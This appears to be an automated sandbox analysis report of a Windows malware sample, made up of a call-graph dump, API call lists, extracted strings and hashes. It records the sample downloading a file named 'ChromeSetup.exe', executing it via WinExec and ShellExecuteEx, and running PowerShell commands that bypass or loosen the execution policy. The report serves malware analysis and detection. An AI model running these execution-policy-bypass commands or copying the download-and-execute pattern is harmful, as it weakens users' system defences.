?_Xlength_error@std@@YAXPBD 11520->11529 11522 10014b3f Concurrency::task_continuation_context::task_continuation_context 11530 10015250 11522->11530 11523->11522 11525 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11523->11525 11525->11522 11526 10014b8b _Error_objects 11533 100151a0 11526->11533 11529->11523 11537 100153c0 11530->11537 11534 10014bbe 11533->11534 11535 100151af 11533->11535 11534->11492 11536 10003230 _invalid_parameter_noinfo_noreturn 11535->11536 11536->11534 11538 100152a0 memcpy 11537->11538 11539 10015264 11538->11539 11539->11526 11542 10013c93 11541->11542 11544 10013c85 11541->11544 11545 10014d00 11542->11545 11544->11501 11546 10014d2d Concurrency::task_continuation_context::task_continuation_context 11545->11546 11547 10014d6f 11546->11547 11560 10013090 ?_Xlength_error@std@@YAXPBD 11546->11560 11549 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11547->11549 11550 10014d95 HandleT 11549->11550 11551 10014e06 11550->11551 11552 10014de8 11550->11552 11554 10014bd0 memcpy 11551->11554 11553 10014bd0 memcpy 11552->11553 11557 10014e01 11553->11557 11555 10014e1d 11554->11555 11556 10014bd0 memcpy 11555->11556 11556->11557 11558 100142f0 _invalid_parameter_noinfo_noreturn 11557->11558 11559 10014ea1 11558->11559 11559->11544 11560->11547 11562 1001279a Concurrency::task_continuation_context::task_continuation_context 11561->11562 11569 10013e30 11562->11569 11566 100129fa Concurrency::task_continuation_context::task_continuation_context 11565->11566 11576 10013280 11566->11576 11571 10013e3e 11569->11571 11573 100127ca 11569->11573 11571->11573 11574 100049b0 memchr 11571->11574 11575 100049e0 memcmp 11571->11575 11573->11449 11574->11571 11575->11571 11577 10003980 ?_Xout_of_range@std@@YAXPBD 11576->11577 11578 1001329b 11577->11578 11579 100132e0 11578->11579 11580 100132bc Concurrency::task_continuation_context::task_continuation_context 11578->11580 11581 
10013361 11579->11581 11582 10013300 Concurrency::task_continuation_context::task_continuation_context 11579->11582 11596 100039e0 memcpy 11580->11596 11583 1001342d 11581->11583 11590 1001337c Concurrency::task_continuation_context::task_continuation_context 11581->11590 11597 100039e0 memcpy 11582->11597 11602 10014100 11583->11602 11587 10013325 11598 100039e0 memcpy 11587->11598 11599 100039e0 memcpy 11590->11599 11591 100133f1 11600 100039e0 memcpy 11591->11600 11593 10013405 11601 100036d0 memcpy 11593->11601 11595 10012a15 11595->11449 11596->11595 11597->11587 11598->11595 11599->11591 11600->11593 11601->11595 11603 10014120 Concurrency::task_continuation_context::task_continuation_context 11602->11603 11605 1001412d Concurrency::task_continuation_context::task_continuation_context 11603->11605 11615 10001410 ?_Xlength_error@std@@YAXPBD 11603->11615 11606 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11605->11606 11607 10014167 HandleT _Error_objects 11606->11607 11608 1001419c HandleT 11607->11608 11609 100141ef 11607->11609 11616 10013460 11608->11616 11610 10013460 memcpy 11609->11610 11614 100141e2 Concurrency::task_continuation_context::task_continuation_context 11610->11614 11613 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11613->11614 11614->11595 11615->11605 11623 100036d0 memcpy 11616->11623 11618 10013478 11624 100036d0 memcpy 11618->11624 11620 1001348f 11625 100036d0 memcpy 11620->11625 11622 100134b8 11622->11613 11623->11618 11624->11620 11625->11622 11627 100143da Concurrency::task_continuation_context::task_continuation_context 11626->11627 11630 100148c0 11627->11630 11631 10003980 ?_Xout_of_range@std@@YAXPBD 11630->11631 11632 100148db 11631->11632 11633 100149bc 11632->11633 11636 1001490e Concurrency::task_continuation_context::task_continuation_context 11632->11636 11645 10014ff0 11633->11645 11635 100143f1 11635->11457 11642 
100039e0 memcpy 11636->11642 11638 10014980 11643 100036d0 memcpy 11638->11643 11640 10014994 11644 100036d0 memcpy 11640->11644 11642->11638 11643->11640 11644->11635 11646 10015010 Concurrency::task_continuation_context::task_continuation_context 11645->11646 11648 1001501d Concurrency::task_continuation_context::task_continuation_context 11646->11648 11658 10001410 ?_Xlength_error@std@@YAXPBD 11646->11658 11649 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11648->11649 11650 10015057 HandleT _Error_objects 11649->11650 11651 100150db 11650->11651 11652 1001508c HandleT 11650->11652 11653 100149f0 memcpy 11651->11653 11659 100149f0 11652->11659 11655 100150ce Concurrency::task_continuation_context::task_continuation_context 11653->11655 11655->11635 11657 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11657->11655 11658->11648 11666 100036d0 memcpy 11659->11666 11661 10014a08 11667 100036d0 memcpy 11661->11667 11663 10014a1f 11668 100036d0 memcpy 11663->11668 11665 10014a42 11665->11657 11666->11661 11667->11663 11668->11665 11670 100124bb 11669->11670 11681 10012f80 11670->11681 11734 10012f10 11673->11734 11676 10012434 11676->11469 11677 10012418 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11677->11676 11754 10012440 11678->11754 11680 100053e2 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 11680->11465 11682 10012fd0 HandleT 11681->11682 11683 10012fab ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 11681->11683 11684 10012fe0 ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N 11682->11684 11683->11682 11691 10013680 ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE 11684->11691 11688 1001304f 11689 10013053 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11688->11689 11690 10005333 ??Bios_base@std@ 11688->11690 11689->11690 11690->11463 11690->11466 11703 10012e40 
11691->11703 11694 100135c0 11695 100135e7 11694->11695 11696 100135eb ?_Fiopen@std@@YAPAU_iobuf@@PBDHH 11694->11696 11695->11688 11696->11695 11697 1001360d 11696->11697 11698 10012e40 3 API calls 11697->11698 11699 1001361b ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 11698->11699 11709 10013a70 ??0_Lockit@std@@QAE@H ??Bid@locale@std@ 11699->11709 11701 10013642 11719 10012cd0 ?always_noconv@codecvt_base@std@ 11701->11719 11704 10012e4f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11703->11704 11706 10012e7f 11704->11706 11707 10012ede 11704->11707 11706->11707 11708 10012e88 _get_stream_buffer_pointers ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001 11706->11708 11707->11694 11708->11707 11723 10004cc0 11709->11723 11712 10013b47 ??1_Lockit@std@@QAE 11712->11701 11713 10013ad7 ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@ 11714 10013af5 11713->11714 11715 10013aed 11713->11715 11730 10015eef malloc 11714->11730 11727 10004c10 11715->11727 11718 10013acf 11718->11712 11720 10012cf3 HandleT 11719->11720 11721 10012ce7 11719->11721 11722 10012cfc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11720->11722 11721->11695 11722->11721 11724 10004cd7 11723->11724 11725 10004d11 ?_Getgloballocale@locale@std@@CAPAV_Locimp@12 11724->11725 11726 10004d0c 11724->11726 11725->11726 11726->11712 11726->11713 11726->11718 11728 10004be0 std::bad_alloc::bad_alloc 11727->11728 11729 10004c1e _CxxThrowException 11728->11729 11729->11718 11731 10015f02 11730->11731 11732 10015f17 ?_Xbad_alloc@std@ 11730->11732 11731->11718 11733 10015f1d 11732->11733 11733->11718 11735 10012f22 11734->11735 11743 10012f5a 11734->11743 11744 10012c90 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11735->11744 11737 10012e40 3 API calls 11739 10012414 11737->11739 11739->11676 11739->11677 11743->11737 11745 10012cc9 11744->11745 11746 10012caa ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 
11744->11746 11747 10012d20 11745->11747 11746->11745 11748 10012d32 Concurrency::task_continuation_context::task_continuation_context 11747->11748 11752 10012d3d fclose 11747->11752 11749 10012d8a ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 11748->11749 11748->11752 11750 10012dbf 11749->11750 11751 10012de1 fwrite 11750->11751 11750->11752 11751->11752 11753 10012e00 11751->11753 11752->11743 11753->11752 11757 10012390 11754->11757 11756 10012482 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 11756->11680 11758 100123c6 11757->11758 11759 100123be 11757->11759 11761 100123db ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE 11758->11761 11762 10012f10 8 API calls 11758->11762 11760 10012c90 2 API calls 11759->11760 11760->11758 11761->11756 11763 100123da 11762->11763 11763->11761 11765 100146ec HandleT Concurrency::task_continuation_context::task_continuation_context 11764->11765 11766 10014782 HandleT Concurrency::task_continuation_context::task_continuation_context 11765->11766 11771 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11765->11771 11773 100036d0 memcpy 11766->11773 11768 100147ca 11774 100036d0 memcpy 11768->11774 11770 100147e1 _Error_objects Concurrency::task_continuation_context::task_continuation_context 11770->11476 11771->11766 11772->11473 11773->11768 11774->11770 11776 1000b5a8 11775->11776 11777 10002da0 8 API calls 11776->11777 11778 1000b5be 11777->11778 12017 10005540 GetModuleFileNameA 11778->12017 11780 1000b5d1 _Smanip _Error_objects 11781 10012640 9 API calls 11780->11781 11782 1000bc37 _Smanip _Error_objects 11781->11782 11783 10012640 9 API calls 11782->11783 11784 10010552 11783->11784 11785 10005400 9 API calls 11784->11785 11786 10010569 11785->11786 11787 10005400 9 API calls 11786->11787 11788 10010583 _Error_objects 11787->11788 11789 10004fe0 17 API calls 11788->11789 11790 100105bf 11789->11790 11791 10002cd0 _invalid_parameter_noinfo_noreturn 
11790->11791 11792 100105da 11791->11792 11793 10002cb0 _invalid_parameter_noinfo_noreturn 11792->11793 11794 100105e5 11793->11794 11795 10004fe0 17 API calls 11794->11795 11796 100105f9 11795->11796 11797 10002cd0 _invalid_parameter_noinfo_noreturn 11796->11797 11798 10010614 11797->11798 11799 10002cb0 _invalid_parameter_noinfo_noreturn 11798->11799 11800 1001061f 11799->11800 11801 100054b0 9 API calls 11800->11801 11802 100106e4 _Smanip _Error_objects 11801->11802 11803 10012640 9 API calls 11802->11803 11804 10010770 11803->11804 11805 10005400 9 API calls 11804->11805 11806 10010787 11805->11806 11807 10012620 _invalid_parameter_noinfo_noreturn 11806->11807 11808 10010799 11807->11808 11809 10002e20 8 API calls 11808->11809 11810 100107bf 11809->11810 11811 10005250 13 API calls 11810->11811 11812 100107cb _Smanip _Error_objects 11811->11812 11813 10012640 9 API calls 11812->11813 11814 10010881 11813->11814 11815 10005400 9 API calls 11814->11815 11816 10010898 11815->11816 11817 100138d0 11 API calls 11816->11817 11818 100108cb 11817->11818 11819 10002cb0 _invalid_parameter_noinfo_noreturn 11818->11819 11820 100108dd 11819->11820 11821 10012620 _invalid_parameter_noinfo_noreturn 11820->11821 11822 100108ec 11821->11822 11823 10005520 DeleteFileA 11822->11823 11824 100108fe 11823->11824 11825 10002da0 8 API calls 11824->11825 11826 10010918 11825->11826 11827 10005300 31 API calls 11826->11827 11828 1001092f 11827->11828 11829 10002cb0 _invalid_parameter_noinfo_noreturn 11828->11829 11830 10010941 Sleep 11829->11830 11831 10010959 11830->11831 11832 10002da0 8 API calls 11831->11832 11833 10010965 _Smanip _Error_objects 11832->11833 11834 10012640 9 API calls 11833->11834 11835 100109da 11834->11835 11836 10005400 9 API calls 11835->11836 11837 100109f1 11836->11837 11838 10002e20 8 API calls 11837->11838 11839 10010a3b 11838->11839 11840 10005250 13 API calls 11839->11840 11841 10010a47 11840->11841 11842 10002cb0 _invalid_parameter_noinfo_noreturn 
11841->11842 11843 10010a5f 11842->11843 11844 10012620 _invalid_parameter_noinfo_noreturn 11843->11844 11845 10010a6e 11844->11845 11846 10002cb0 _invalid_parameter_noinfo_noreturn 11845->11846 11847 10010a7d 11846->11847 11848 10002da0 8 API calls 11847->11848 11849 10010a95 _Smanip _Error_objects 11848->11849 11850 10012640 9 API calls 11849->11850 11851 10010b0e 11850->11851 11852 10005400 9 API calls 11851->11852 11853 10010b25 11852->11853 11854 10002e20 8 API calls 11853->11854 11855 10010b6f 11854->11855 11856 10005250 13 API calls 11855->11856 11857 10010b7b 11856->11857 11858 10002cd0 _invalid_parameter_noinfo_noreturn 11857->11858 11859 10010ba2 11858->11859 11860 10002cb0 _invalid_parameter_noinfo_noreturn 11859->11860 11861 10010bad 11860->11861 11862 10002cb0 _invalid_parameter_noinfo_noreturn 11861->11862 11863 10010bbc 11862->11863 11864 10012620 _invalid_parameter_noinfo_noreturn 11863->11864 11865 10010bcb 11864->11865 11866 10002cb0 _invalid_parameter_noinfo_noreturn 11865->11866 11867 10010bda 11866->11867 11868 100139a0 8 API calls 11867->11868 11869 10010bf3 11868->11869 11870 10013a30 9 API calls 11869->11870 11871 10010c21 11870->11871 11872 10013a30 9 API calls 11871->11872 11873 10010c4f 11872->11873 11874 10013a30 9 API calls 11873->11874 11875 10010c7d 11874->11875 11876 10013a30 9 API calls 11875->11876 11877 10010cab 11876->11877 11878 10013a30 9 API calls 11877->11878 11879 10010cd9 11878->11879 11880 10013a30 9 API calls 11879->11880 11881 10010d07 11880->11881 11882 10013a30 9 API calls 11881->11882 11883 10010d35 11882->11883 11884 10013a30 9 API calls 11883->11884 11885 10010d63 11884->11885 11886 10013a30 9 API calls 11885->11886 11887 10010d91 11886->11887 11888 10013a30 9 API calls 11887->11888 11889 10010dbf 11888->11889 11890 10013a30 9 API calls 11889->11890 11891 10010ded 11890->11891 11892 10002cb0 _invalid_parameter_noinfo_noreturn 11891->11892 11893 10010dff 11892->11893 11894 10002cb0 _invalid_parameter_noinfo_noreturn 
11893->11894 11895 10010e0e 11894->11895 11896 10002cb0 _invalid_parameter_noinfo_noreturn 11895->11896 11897 10010e1d 11896->11897 11898 10002cb0 _invalid_parameter_noinfo_noreturn 11897->11898 11899 10010e2c 11898->11899 11900 10002cb0 _invalid_parameter_noinfo_noreturn 11899->11900 11901 10010e3b 11900->11901 11902 10002cb0 _invalid_parameter_noinfo_noreturn 11901->11902 11903 10010e4a 11902->11903 11904 10002cb0 _invalid_parameter_noinfo_noreturn 11903->11904 11905 10010e59 11904->11905 11906 10002cb0 _invalid_parameter_noinfo_noreturn 11905->11906 11907 10010e68 11906->11907 11908 10002cb0 _invalid_parameter_noinfo_noreturn 11907->11908 11909 10010e77 11908->11909 11910 10002cb0 _invalid_parameter_noinfo_noreturn 11909->11910 11911 10010e86 11910->11911 11912 10002cb0 _invalid_parameter_noinfo_noreturn 11911->11912 11913 10010e95 11912->11913 11914 10005520 DeleteFileA 11913->11914 11915 10010ea7 11914->11915 11916 10002da0 8 API calls 11915->11916 11917 10010ec1 11916->11917 11918 10005300 31 API calls 11917->11918 11919 10010ed8 11918->11919 11920 10002cb0 _invalid_parameter_noinfo_noreturn 11919->11920 11921 10010eea Sleep 11920->11921 11922 10010f02 _Smanip _Error_objects 11921->11922 11923 10012640 9 API calls 11922->11923 11924 10011151 11923->11924 11925 10005400 9 API calls 11924->11925 11926 10011168 _Smanip _Error_objects 11925->11926 11927 10012640 9 API calls 11926->11927 11928 1001120e 11927->11928 11929 10005400 9 API calls 11928->11929 11930 10011225 11929->11930 11931 10013890 9 API calls 11930->11931 11932 10011264 11931->11932 11933 10002cb0 _invalid_parameter_noinfo_noreturn 11932->11933 11934 10011276 11933->11934 11935 10012620 _invalid_parameter_noinfo_noreturn 11934->11935 11936 10011285 11935->11936 11937 10002cb0 _invalid_parameter_noinfo_noreturn 11936->11937 11938 10011294 11937->11938 11939 10012620 _invalid_parameter_noinfo_noreturn 11938->11939 11940 100112a3 11939->11940 11941 100112b1 WinExec 11940->11941 11942 100112c4 _Smanip 
                                                                                                  APIs
                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 008D04AE
                                                                                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 008D04DE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                                                  • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                  • API String ID: 2032221330-2899676511
                                                                                                  • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                  • Instruction ID: b83132b0c60866f701317c0aa86096a2508a9918ea931c656f89b395ec53190e
                                                                                                  • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                  • Instruction Fuzzy Hash: 2B626A315083858FD720CF24C840BABBBE5FF94714F144A2EE9C99B392E774A949CB56

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 100020D3
                                                                                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 100020EF
                                                                                                  • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,1001844C,?,?,10017512,000000FF), ref: 10002101
                                                                                                  • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10002136
                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10002153
                                                                                                    • Part of subcall function 10001D60: VariantInit.OLEAUT32(?), ref: 10001D6B
                                                                                                    • Part of subcall function 10001D80: VariantClear.OLEAUT32(10002776), ref: 10001D8B
                                                                                                    • Part of subcall function 10001A20: _com_issue_error.COMSUPP ref: 10001A92
                                                                                                  • InternetReadFile.WININET(?,?,00001000,?), ref: 1000216E
                                                                                                  • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10002197
                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 10002230
                                                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10002240
                                                                                                  • InternetCloseHandle.WININET(?), ref: 1000224D
                                                                                                  • InternetCloseHandle.WININET(?), ref: 10002257
                                                                                                  • GetParent.USER32(?), ref: 10002261
                                                                                                  • ShowWindow.USER32(?,00000000,?,000000FF), ref: 10002270
                                                                                                  • WaitForSingleObject.KERNEL32(0000055C,00007530,?,000000FF), ref: 10002282
                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,000000FF), ref: 1000228C
                                                                                                  • CoCreateInstance.OLE32(1001837C,00000000,00000001,1001836C,00000000), ref: 100022AE
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                                    • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                                    • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Internet$Variant$CloseCreateHandleInitMessageOpenSendSleep$ClearFileHttpInfoInitializeInstanceObjectParentQueryReadShowSingleSnapshotToolhelp32WaitWindow_com_issue_errorexitfclosefopenfwrite
                                                                                                  • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$ChromeSetup.exe$URLDownloader
                                                                                                  • API String ID: 2588663270-2833095850
                                                                                                  • Opcode ID: c9b4f2acf23c8b8e7e324eeffd37ffd6b563c1d675994be5fdea45c9a92adb6a
                                                                                                  • Instruction ID: 1a265d8126e776f6a60fe0a7d1a5fce7a7262b6fb56b0006430606afee9c3406
                                                                                                  • Opcode Fuzzy Hash: c9b4f2acf23c8b8e7e324eeffd37ffd6b563c1d675994be5fdea45c9a92adb6a
                                                                                                  • Instruction Fuzzy Hash: 89427DB4E012289FDB64CF59C895BDDBBB5BF49300F1082DAE909A7355DB30AA85CF50

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _Smanip.LIBCPMTD ref: 10005DF2
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A195
                                                                                                    • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                                    • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                    • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                    • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                    • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                  • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A630
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A764
                                                                                                  • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                                  • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                                  • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                                  • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                                  • _Smanip.LIBCPMTD ref: 1000B046
                                                                                                  • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                                  • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                                  • String ID: .NET Framework Action$/C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                                  • API String ID: 1867003993-3862442261
                                                                                                  • Opcode ID: b0ee089b01d6b1e17c926042021f85da182826e1f840194c69618660950b3ddc
                                                                                                  • Instruction ID: c3f484f0cadaf97ba32f422996ffd4aa446fbc6566911116cce282fd85213db7
                                                                                                  • Opcode Fuzzy Hash: b0ee089b01d6b1e17c926042021f85da182826e1f840194c69618660950b3ddc
                                                                                                  • Instruction Fuzzy Hash: 2FD36A50D0D6E8C9EB22C2288C587DDBEB55B22749F4441D9819C2A283C7BF1FD9CF66

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                                    • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                                    • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                    • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                    • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                    • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                  • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A630
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A764
                                                                                                  • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                                  • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                                  • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                                  • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                                  • _Smanip.LIBCPMTD ref: 1000B046
                                                                                                  • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                                  • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                                  • String ID: /C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                                  • API String ID: 1867003993-2154795836
                                                                                                  • Opcode ID: b95d4323615e4dbc46461cad133ddac9392ad2e1edfb6e9f7f37158bc2c31dc6
                                                                                                  • Instruction ID: 5ee5c772d32b0c25501e7099b99da70bcf1678fc7b94072c772d4481403b0835
                                                                                                  • Opcode Fuzzy Hash: b95d4323615e4dbc46461cad133ddac9392ad2e1edfb6e9f7f37158bc2c31dc6
                                                                                                  • Instruction Fuzzy Hash: 88B24C74C08298DEEB25CB68CC45BDEBBB5AF15304F0441D9E14D67292DBB52B88CF62

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 10001682
                                                                                                    • Part of subcall function 10001430: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                                    • Part of subcall function 10001430: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                                    • Part of subcall function 10001430: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 10001798
                                                                                                  • RegisterClassW.USER32(?), ref: 100017F7
                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 100017FF
